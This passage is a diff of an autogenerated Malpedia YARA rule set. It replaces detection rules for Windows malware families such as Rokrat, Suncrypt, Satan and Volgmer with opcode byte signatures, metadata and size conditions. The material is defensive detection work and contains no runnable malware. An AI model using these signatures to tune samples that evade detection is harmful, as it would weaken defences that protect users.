+		$sequence_2 = { 83e01f c1f905 8b0c8d004c0110 c1e006 03c1 f6400401 7524 }
+		$sequence_3 = { 2bc1 d1f8 6683bc44760400005c 7411 }
+		$sequence_4 = { a1???????? 33c5 89857c070000 53 8b9d88070000 56 57 }
+		$sequence_5 = { 57 ff742418 57 e8???????? 83c40c ff742414 }
+		$sequence_6 = { 6683bc447e0600005c 7411 68???????? 8d9c2484060000 e8???????? 8d44244c }
+		$sequence_7 = { 83ffff 741d 8b54240c 56 6a64 8d442444 59 }
+		$sequence_8 = { 57 6689842484060000 8d842486060000 56 50 e8???????? 83c40c }
+		$sequence_9 = { 59 56 57 ff15???????? 68???????? e8???????? 68???????? }
 
 	condition:
-		7 of them and filesize < 999424
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Rokrat_Auto : FILE
+rule MALPEDIA_Win_Unidentified_100_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a9d530d2-3818-5ce9-961b-9b84701cc153"
+		id = "e8675cb6-73bb-59b5-91a8-02c6f92da222"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rokrat_auto.yar#L1-L156"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_100"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_100_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "34b666dd9c341c0b6a658755dae5641a6ccdd1f0414b3f92f59cfa0e0e0a459a"
+		logic_hash = "a4a5162870b4493fc5243e7bd2eeeb85f162da808d7efca293e2e60ad15e324b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94296,38 +94487,32 @@ rule MALPEDIA_Win_Rokrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 6a18 33c0 }
-		$sequence_1 = { 50 e8???????? 6a10 33c0 }
-		$sequence_2 = { 50 e8???????? 8d4568 8d4e60 }
-		$sequence_3 = { 6a00 50 8bcb e8???????? 8d4550 }
-		$sequence_4 = { 668945d8 e8???????? c645fc03 8b45bc }
-		$sequence_5 = { 0fb7c1 50 0fb74208 c1e910 51 50 0fb74212 }
-		$sequence_6 = { 56 50 8d45f4 64a300000000 c745fc00000000 33c0 }
-		$sequence_7 = { 50 ff15???????? e8???????? 40 }
-		$sequence_8 = { 50 8bcf e8???????? 8d4538 3bd8 }
-		$sequence_9 = { ff15???????? 50 e8???????? 59 6a64 }
-		$sequence_10 = { 897dfc e8???????? 68???????? 8d4dd8 e8???????? }
-		$sequence_11 = { c1e004 8b44100c 5d 5b }
-		$sequence_12 = { c1e006 03048dc03b5500 eb02 8bc2 }
-		$sequence_13 = { c1e004 8b441008 85c0 7418 }
-		$sequence_14 = { c1e004 8b441004 8d5001 8a08 40 }
-		$sequence_15 = { c1e004 8d0c10 51 e8???????? }
+		$sequence_0 = { 83f8ff 751e 488d8c2490020000 ff15???????? 4889442430 488b4c2430 ff15???????? }
+		$sequence_1 = { 4833c4 4889442428 488d442450 4889442420 4c8b4c2420 4c8b442448 baf4010000 }
+		$sequence_2 = { 48ffc1 eb0f 0fb601 4a0fbe842830730200 4803c8 48ffc7 48ffc1 }
+		$sequence_3 = { 488b4c2470 c6040104 e9???????? 48630424 488b4c2478 0fb60401 }
+		$sequence_4 = { 448b4c2440 4c8d05e7e00100 ba14000000 488d8c2430030000 e8???????? 488d842448030000 4889442428 }
+		$sequence_5 = { e8???????? 4533c9 4c8d8424e0040000 488d942490090000 33c9 e8???????? 33c0 }
+		$sequence_6 = { 8b4c2454 e8???????? 8b442460 89442464 8b542464 488d8c24e0020000 }
+		$sequence_7 = { 8b0d???????? 488bd8 33d2 e8???????? 4885db 7414 488d052a090200 }
+		$sequence_8 = { b901000000 486bc902 488b542418 88040a b801000000 486bc003 }
+		$sequence_9 = { e8???????? 488b8c2430010000 e8???????? 89442448 4883bc243001000000 740d }
 
 	condition:
-		7 of them and filesize < 2932736
+		7 of them and filesize < 372736
 }
-rule MALPEDIA_Win_Mozart_Auto : FILE
+rule MALPEDIA_Win_Payloadbin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "658c5c82-39a0-5f12-babc-c6dbc8b0b70f"
+		id = "b954a512-78f3-562b-9197-a6a1e74a513b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mozart_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.payloadbin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.payloadbin_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "ebee3e9c74f8823fb3c803b1df028db4b37d86893944724b3d21b6503c5bed66"
+		logic_hash = "800c1bff3826d8d61dac146dc7e96bbf271b1fb2a9cc74c55e98e32d0540be8c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94341,32 +94526,32 @@ rule MALPEDIA_Win_Mozart_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c705????????01000000 c705????????04000000 890d???????? 890d???????? 890d???????? ff15???????? }
-		$sequence_1 = { 33f6 c644241800 eb39 80fb3d }
-		$sequence_2 = { e8???????? 81c404040000 c3 55 e8???????? 8b8c2414040000 83c404 }
-		$sequence_3 = { c6042900 8b4c244c 5d b801000000 5b e8???????? }
-		$sequence_4 = { 51 53 b8???????? 56 33d2 }
-		$sequence_5 = { 880429 41 83c603 8d46ff }
-		$sequence_6 = { 8b8c2450010000 83c40c e8???????? 5f }
-		$sequence_7 = { c605????????76 c605????????2e a2???????? c605????????78 a2???????? c605????????00 }
-		$sequence_8 = { 83fe10 7409 33f6 c644241800 eb39 80fb3d 740e }
-		$sequence_9 = { 5f 5e 5d 5b 8bc2 f7d8 }
+		$sequence_0 = { 4158 9d 4158 e8???????? 680269e26f 6811373c52 66450fb3db }
+		$sequence_1 = { 83f803 e9???????? 0f8526010000 488bcb e9???????? ff15???????? }
+		$sequence_2 = { 68eb3a8171 55 68396f8656 6819276b5f 682109a155 4c8b6c2438 48c7442438404fa1db }
+		$sequence_3 = { 52 0f94842418000000 488b942418000000 480fbfd2 80bc1418f0ffffe7 }
+		$sequence_4 = { 4c8d8424a0000000 488bd5 b95d493af4 e8???????? 413bc7 0f85e1000000 8b942498000000 }
+		$sequence_5 = { 488d8c2450020000 2bd2 4d0fb7c7 6641b8b54c 450fbfc7 }
+		$sequence_6 = { 448b542500 f5 4433d7 4084cc 4181c20c7cff4d 41c1c202 f8 }
+		$sequence_7 = { 8d56d4 fa 158935079e 9e 4657 250543b1d9 f661fd }
+		$sequence_8 = { 9c 49bc5c58ad71e53eea3c 4180ec5e f8 4881842408000000e258ecff 685b136c32 }
+		$sequence_9 = { 4180fd52 4983c004 3bc8 e9???????? 0f860a000000 b801000000 e9???????? }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 3761152
 }
-rule MALPEDIA_Win_Suncrypt_Auto : FILE
+rule MALPEDIA_Win_Moriya_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c1bd9658-a178-589d-b259-6cb82442d52c"
+		id = "45383b38-ad7d-58f1-bbb1-9d0f7680c4d8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.suncrypt_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriya"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moriya_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "49201b307b7d384a9877d33cd9429c04ac8ef7ebb302c664ae5e0393ef621a39"
+		logic_hash = "1ab9803873e98ee1cb5c5f8b1cc931b7d333aed621e9979986cfb9846e4dee1c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94380,32 +94565,32 @@ rule MALPEDIA_Win_Suncrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75f3 56 8b35???????? ffd6 ff75bc ffd6 ff75b8 }
-		$sequence_1 = { 837dfc00 c745cc00000000 0f86c9020000 8975d8 f6460c02 }
-		$sequence_2 = { ffd7 6808020000 6a00 68???????? a3???????? e8???????? 83c40c }
-		$sequence_3 = { 51 68???????? ffd3 3bc6 75db 3bd7 75d7 }
-		$sequence_4 = { c6857efeffff6d c6857ffeffff69 c68580feffff3a c68581feffff54 c68582feffff4e c68583feffff3a c68584feffff2b }
-		$sequence_5 = { 8a4616 240f 3c0a 7519 8b4508 66394608 }
-		$sequence_6 = { 894f34 8b4b1c 0f299d70ffffff 0f29ad40ffffff 0f29a550ffffff 0f29bdc0fdffff }
-		$sequence_7 = { 0f100e 894df4 8b4df0 660fefc8 0f104610 0f110a 0f104f10 }
-		$sequence_8 = { 6800020000 51 50 e8???????? 0fa4c209 c1e009 898338810200 }
-		$sequence_9 = { 41 83f810 72ef 5f }
+		$sequence_0 = { 418067bb0f 8a4618 240f 410847bb }
+		$sequence_1 = { 83c204 e8???????? 8b4708 48894338 33d2 }
+		$sequence_2 = { 488b0d???????? 4533c9 f30f7f45a0 4889442470 4533c0 0f1007 }
+		$sequence_3 = { 7443 0f57c0 33c0 0f1107 }
+		$sequence_4 = { 488364246000 4c8d4c2460 488364246800 4c8d442468 ba01000000 488d4c2470 }
+		$sequence_5 = { e8???????? 33d2 488905???????? 418bce 4885c0 7509 4c8d05b60f0000 }
+		$sequence_6 = { 4983e007 7417 660f1f840000000000 8a4411ff }
+		$sequence_7 = { 488bc8 e8???????? 4c8b4730 4c8d4c2420 488b15???????? 488bcf }
+		$sequence_8 = { 498bc9 e8???????? 418bc4 4869c838010000 4903cd }
+		$sequence_9 = { 7831 488b0d???????? 488b81e0000000 488905???????? }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 58368
 }
-rule MALPEDIA_Win_Tokyox_Auto : FILE
+rule MALPEDIA_Win_Unidentified_099_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "57574695-5c21-57dd-9f3e-5c009f7654f6"
+		id = "d97436b2-5a7b-573d-8a35-42ed42551daa"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tokyox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tokyox_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_099"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_099_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "e5ebbfb35065dbc14f8f4e75c7bbc71cffc1206aa4b5e3c10e8410f8c2a12bf7"
+		logic_hash = "05815599a06afec044356539b7fb022948a8fa88c4aa5bb33d6e484e946176ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94419,32 +94604,32 @@ rule MALPEDIA_Win_Tokyox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff700c 8b08 ff7008 e8???????? 8945e4 3de22e0000 }
-		$sequence_1 = { 50 ff7508 c745fc616d6500 ff15???????? }
-		$sequence_2 = { 8bce 83c40c 33c0 668907 8d5101 }
-		$sequence_3 = { 8d45fc 8b35???????? 50 6a1f }
-		$sequence_4 = { 6689047e eb18 52 8d85f0faffff c645a000 50 ff75a0 }
-		$sequence_5 = { 6a00 68e9fd0000 ff15???????? 8b450c 8930 33f6 eb11 }
-		$sequence_6 = { 3de22e0000 74d8 6a01 ff7508 }
-		$sequence_7 = { 8d85ecefffff 6a00 50 e8???????? 83c40c c7451000000000 }
-		$sequence_8 = { 8d8df0fcffff 8d45c8 0f4345c8 51 50 ff15???????? 8bf8 }
-		$sequence_9 = { 56 6a00 6a01 ff15???????? 8bcb 8d5102 90 }
+		$sequence_0 = { 4d8bc4 418bd6 498bcf e8???????? 4c8d8df0010000 458bc6 498bd7 }
+		$sequence_1 = { c5f35cca c4c173590cc1 4c8d0d158f0000 c5f359c1 c5fb101d???????? }
+		$sequence_2 = { 33d2 488bce ff15???????? 488bce 85c0 0f84be000000 4c8d4c244c }
+		$sequence_3 = { 4883f9ff 7406 ff15???????? 48832300 4883c308 488d050d9e0100 }
+		$sequence_4 = { f7842484000000f8ffffff 4c89b424b8210000 448bf7 0f8651020000 48899c24e0210000 4889ac24e8210000 4889b424f0210000 }
+		$sequence_5 = { 488bf9 498bc2 418be9 48c1f806 488d0db4ee0000 4183e23f }
+		$sequence_6 = { 0f1005???????? 0fb7442440 0f1101 66894110 488d4b26 4885c9 }
+		$sequence_7 = { b910000000 e8???????? 4c8bc8 488bf8 33c0 }
+		$sequence_8 = { 488b05???????? 4833c4 48898580020000 b940000000 e8???????? }
+		$sequence_9 = { c7442470fedcba98 c744247476543210 660f1f440000 49ffc0 42803c0000 75f6 488d55d0 }
 
 	condition:
-		7 of them and filesize < 237568
+		7 of them and filesize < 314368
 }
-rule MALPEDIA_Win_Photofork_Auto : FILE
+rule MALPEDIA_Win_Satan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ceb1cb1f-8247-52bb-81a3-fc6627c948bc"
+		id = "30dbe56c-8c73-5146-b780-34e6bf716dbf"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photofork"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.photofork_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.satan_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "55c8708d569da20398deafe5dc1cb0108f4fd9e562f2f0448ff6d194ec946bbd"
+		logic_hash = "684fd8d03725a857adc2201582faa570633fcd21041d464e35a18c1f078d9ea5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94458,32 +94643,32 @@ rule MALPEDIA_Win_Photofork_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 4154 4156 488bec 4883ec50 33ff }
-		$sequence_1 = { 48ffc1 4883f903 72ea 458bcd }
-		$sequence_2 = { 488981e0100000 eb12 ba01000000 33c9 }
-		$sequence_3 = { 8b4544 0fb64540 84c0 750b }
-		$sequence_4 = { 4c8d45c4 eb72 488b05???????? 4885c0 742c 488b8080010000 }
-		$sequence_5 = { 488b05???????? 4c895048 41b904000000 41b800300000 488bd6 33c9 41ffd2 }
-		$sequence_6 = { d3c8 ffc0 418900 488b7c2428 4c3b4c2430 }
-		$sequence_7 = { c60100 488d4901 4883e801 75f3 488b15???????? 4885d2 }
-		$sequence_8 = { 8b44246c 0fb6442468 84c0 7520 }
-		$sequence_9 = { 4d8b00 488b09 4889442420 e8???????? 488b9c24b8000000 3dc8000000 }
+		$sequence_0 = { 57 837d0c00 740c c78560ffffff01000000 eb0a c78560ffffff00000000 8b8560ffffff }
+		$sequence_1 = { e8???????? 8d4da4 e8???????? 83ee00 }
+		$sequence_2 = { 8a82c8c64700 884118 ebda c745fc00000000 eb09 8b4dfc 83c101 }
+		$sequence_3 = { 6bd117 8982d0d14700 68???????? 8b45fc 50 ff15???????? 3305???????? }
+		$sequence_4 = { c745e801000000 c745e401000000 c745e0bc070000 8d55f8 52 8d45f4 }
+		$sequence_5 = { 7409 ff30 8bcf e8???????? 8b45e8 894708 }
+		$sequence_6 = { 8b10 52 8d4df8 e8???????? 8d4df8 e8???????? 0fb6c0 }
+		$sequence_7 = { 50 e8???????? 83c40c b90c000000 8d75cc 8b7d0c f3a5 }
+		$sequence_8 = { 0f42c8 8b5614 8bc2 f7d0 894dfc 3bc1 0f8607010000 }
+		$sequence_9 = { e8???????? 8d45b8 c745fc10000000 50 8d45e4 b9???????? 50 }
 
 	condition:
-		7 of them and filesize < 99328
+		7 of them and filesize < 1163264
 }
-rule MALPEDIA_Win_Appleseed_Auto : FILE
+rule MALPEDIA_Win_Ghole_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2cab059a-3093-5ea8-b4c6-461dc05f5c9c"
+		id = "6e862057-2c23-515e-8722-3cd2a9153bb9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.appleseed_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ghole_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "7ca6e2559d781302d777182a28464c5fa026ffa48945f1841212525a74a1af82"
+		logic_hash = "7b940f8a5e148214fddbb5db105fb5b0301dfcf2c7e2cf8b7ad48df7aac652b0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94497,32 +94682,32 @@ rule MALPEDIA_Win_Appleseed_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4881ecf0010000 48c745d8feffffff 48895810 48897018 488b05???????? }
-		$sequence_1 = { e8???????? 48833d????????00 0f842e020000 488d150c170200 488d4db8 e8???????? 90 }
-		$sequence_2 = { 7367 4863d9 4c8d357a640100 488bfb 83e31f 48c1ff05 }
-		$sequence_3 = { 85c0 74ac 488d15b2e10100 488bcb e8???????? 85c0 7499 }
-		$sequence_4 = { 817d0063736de0 7528 48833d????????00 741e 488d0da9000100 e8???????? }
-		$sequence_5 = { 488bf0 4889442478 4885c0 7506 }
-		$sequence_6 = { 48898540010000 48c745d80f000000 488975d0 c645c000 4d8bce 4533c0 498bd4 }
-		$sequence_7 = { 48833d????????00 0f8404040000 488d1552170200 488d4db8 e8???????? 90 488d55d8 }
-		$sequence_8 = { e9???????? 488d8af0000000 e9???????? 488b8a60000000 e9???????? 488d8a10010000 e9???????? }
-		$sequence_9 = { 488d4b04 4c8d05df770000 418d5216 e8???????? 85c0 0f8544090000 }
+		$sequence_0 = { 8d5002 48 8bcd e8???????? 48 85c0 48 }
+		$sequence_1 = { 48 8b45d0 48 8b4038 48 8945e8 48 }
+		$sequence_2 = { 89c7 e8???????? 48 8d45d0 be10000000 48 89c7 }
+		$sequence_3 = { 85c0 7422 48 8d85d0feffff ba00000000 be00000000 48 }
+		$sequence_4 = { 837df007 750a b800000000 e9???????? 48 8b45e8 }
+		$sequence_5 = { 4c 896c2450 48 8bd8 4c 8bee 7458 }
+		$sequence_6 = { 8b45e4 48 98 48 0345e8 c60000 }
+		$sequence_7 = { 48 8d3d324b0100 e8???????? b800000000 e9???????? 48 8b05???????? }
+		$sequence_8 = { 48 83c608 668b147b 48 8d1c7b 6685d2 759b }
+		$sequence_9 = { 897de8 48 8975e0 8955dc 48 894dd0 4c }
 
 	condition:
-		7 of them and filesize < 497664
+		7 of them and filesize < 622592
 }
-rule MALPEDIA_Win_Prestige_Auto : FILE
+rule MALPEDIA_Win_Classfon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e0029ece-b029-5766-af56-54e290d25cc7"
+		id = "a25f42c4-4355-51f7-b6ab-00b467c76376"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prestige"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.prestige_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.classfon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.classfon_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "bf3e8d9d4daef418b3a3a7f61bd3283d0f9369ffef531d651e87452e24457972"
+		logic_hash = "66ac3b2c234be6c5adfcd77cebd772d5254febc41066bba0a145357a351f1537"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94536,32 +94721,32 @@ rule MALPEDIA_Win_Prestige_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 89bd60ffffff e8???????? 6a10 56 8d8d60ffffff c645fc02 }
-		$sequence_1 = { 8b7dfc 6a00 57 e8???????? eb3a 8bfe c1e702 }
-		$sequence_2 = { 7407 46 89b558ffffff 80bd5fffffff00 742c 8d4da0 3bc8 }
-		$sequence_3 = { 50 6a01 8d4508 0f57c0 50 8d45fc 660f1345f4 }
-		$sequence_4 = { 0f8406feffff 8ac2 0430 8806 894df0 33c9 }
-		$sequence_5 = { eb0b 88855fffffff 6a02 58 8bc8 51 ff7310 }
-		$sequence_6 = { 8b75f4 8b55fc 3bde 7315 8bc2 33d2 6a0a }
-		$sequence_7 = { e8???????? 51 68???????? 8d8de8f5ffff c645fc56 e8???????? 51 }
-		$sequence_8 = { 83e03f 6bc038 8955f0 8b1495480a4b00 8945f8 8a5c0229 80fb02 }
-		$sequence_9 = { e9???????? 8b4d08 8d45f0 50 c745f054334700 c745f40e000000 }
+		$sequence_0 = { 6a01 56 ffd0 85c0 7511 55 e8???????? }
+		$sequence_1 = { 8d4c2400 c744240000000000 51 68???????? 52 c744241001000000 }
+		$sequence_2 = { e8???????? 8b8c2420020000 8bb42418020000 8bd8 8bd1 8bfb }
+		$sequence_3 = { 0f859d010000 8d4c241c 8d542424 51 8b4c2414 8d442424 52 }
+		$sequence_4 = { 897d04 89450c 894508 894510 8b4b50 }
+		$sequence_5 = { 83c408 40 8bf8 803f00 }
+		$sequence_6 = { ffd3 89be00020000 89be10020000 89be14020000 5f 5e }
+		$sequence_7 = { 03f5 56 89742418 ff15???????? 85c0 0f85c3000000 }
+		$sequence_8 = { e8???????? 83c40c 85c0 7437 8b8c2428020000 }
+		$sequence_9 = { 5f 5e 5b 81c418020000 c3 5f }
 
 	condition:
-		7 of them and filesize < 1518592
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Sanny_Auto : FILE
+rule MALPEDIA_Win_Imprudentcook_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "71ee291c-39d8-5317-9103-639480e4514a"
+		id = "e705cf05-f0e2-52d1-a85e-1511f7ba8697"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sanny_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.imprudentcook"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.imprudentcook_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "ae770490b83cd065ad50cf06c242577c788775793cde0b9ec9f8ad204369466f"
+		logic_hash = "7d085ab823410a63e41a516b8f50c0d9f8600ba4763b5093b512309c5b8e436e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94575,34 +94760,34 @@ rule MALPEDIA_Win_Sanny_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 85c0 7514 50 50 6a7f }
-		$sequence_1 = { a1???????? dd45f4 5b dd5810 a1???????? }
-		$sequence_2 = { 33f5 33fd 8bce 8bc6 c1e904 c1e01c 03c8 }
-		$sequence_3 = { 68???????? 52 e8???????? 83c408 c60000 8d84244c010000 8d8c2414020000 }
-		$sequence_4 = { 8bc8 c1e91d 8d0cc1 8b4204 8bd0 c1ea1d 8d2cc2 }
-		$sequence_5 = { 83c002 50 8d842488000000 50 ffd3 8d8c2484000000 68???????? }
-		$sequence_6 = { 8b4c2410 50 51 52 8bce c644241000 e8???????? }
-		$sequence_7 = { 81c72c010000 3bf5 7cde 8d942414020000 8d842414040000 52 68???????? }
-		$sequence_8 = { 83e01f 8b0c8dc0864100 8d04c1 eb05 b8???????? f6400480 }
-		$sequence_9 = { 890d???????? 8b0d???????? 68???????? a3???????? 68???????? 8d420c }
+		$sequence_0 = { 7310 660f1f440000 4983c508 49ff4500 74f6 488bbc2498000000 488bce }
+		$sequence_1 = { bb02000000 488d5568 488d4d68 448bcb 4c8bc6 e8???????? 4885c0 }
+		$sequence_2 = { 4c8bef 48ffc7 448bf9 f7e1 c1ea07 8bc2 4803c7 }
+		$sequence_3 = { e8???????? 4c8b6c2438 41b91e000000 4d8bc6 488bd3 498bcd e8???????? }
+		$sequence_4 = { 418bc3 48c1ea20 48c1e120 4803c8 488d0419 483bc1 488906 }
+		$sequence_5 = { 4885f6 750f 4885ff 7450 49893e be01000000 eb46 }
+		$sequence_6 = { 498b1439 488b5c2478 488b4dd0 4803ca 483bca 49890c39 488b4de0 }
+		$sequence_7 = { 4d0fafc6 4c8bd3 49c1ea20 480fafd1 4c0fafd9 4a8d0402 4c03d0 }
+		$sequence_8 = { 498bc2 33ed 48c1e004 4c03f8 4c89bc2400010000 4d85c0 0f8eb5000000 }
+		$sequence_9 = { 84c0 7506 4883eb08 75ed 48ffc3 488bcb 48d3ea }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 864256
 }
-rule MALPEDIA_Win_Volgmer_Auto : FILE
+rule MALPEDIA_Win_Mrdec_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ee14de89-49ac-54c0-9028-7fc3ec1ece55"
+		id = "9c58a6c5-fccf-57f8-a955-f9f71c01cd0e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.volgmer_auto.yar#L1-L404"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrdec"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mrdec_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "e0462e79ef6280b8a6003ef7a899cec3de3d795edb85c7c6f37d83222de71a6b"
+		logic_hash = "3ee02aa9dfb3f27619d5f97eac66eb46db9b305219d25b4c3e7969b99a315a5e"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -94614,66 +94799,32 @@ rule MALPEDIA_Win_Volgmer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4533c0 498bd5 33c9 c744242800000008 }
-		$sequence_1 = { 0f298d100c0000 668985200c0000 e8???????? 0f2805???????? 488d8d270d0000 0f280d???????? }
-		$sequence_2 = { 33ed bb01000000 896c2424 448bf7 85db }
-		$sequence_3 = { 488bcb ff542468 8bc6 4c8bb42448180000 4c8ba42488180000 }
-		$sequence_4 = { e8???????? e8???????? e8???????? c705????????04000000 }
-		$sequence_5 = { 85c0 0f84b2000000 458bc7 498bd6 488bcb e8???????? }
-		$sequence_6 = { 4489742420 440fb7c6 488d9550030000 488d8d60040000 }
-		$sequence_7 = { 4489742420 448bc5 488bce 85c0 742f }
-		$sequence_8 = { 41b802010000 e8???????? 33d2 c7453078292e4c }
-		$sequence_9 = { 0fb6840dd0060000 88840de0070000 488d4901 84c0 75e9 }
-		$sequence_10 = { e8???????? 483b3d???????? 741a 488d0535e30000 }
-		$sequence_11 = { 7417 8b85d0f3ffff 85c0 740d 6a00 ffb5d4f3ffff 50 }
-		$sequence_12 = { 8bf7 897c2448 897c244c 897c2458 44896c245c }
-		$sequence_13 = { e8???????? 4585ed 7417 0fb7555b }
-		$sequence_14 = { eb0e c74634047b6e00 c7463806000000 c6463c00 5f }
-		$sequence_15 = { 56 e8???????? 6800010000 8d8318020000 6a00 50 }
-		$sequence_16 = { e8???????? 4881c448010000 415f 415e 415d 5e }
-		$sequence_17 = { c745e0f8ba6e00 e9???????? c745e0e4ba6e00 e9???????? c745dc02000000 c745e0e4ba6e00 8b4508 }
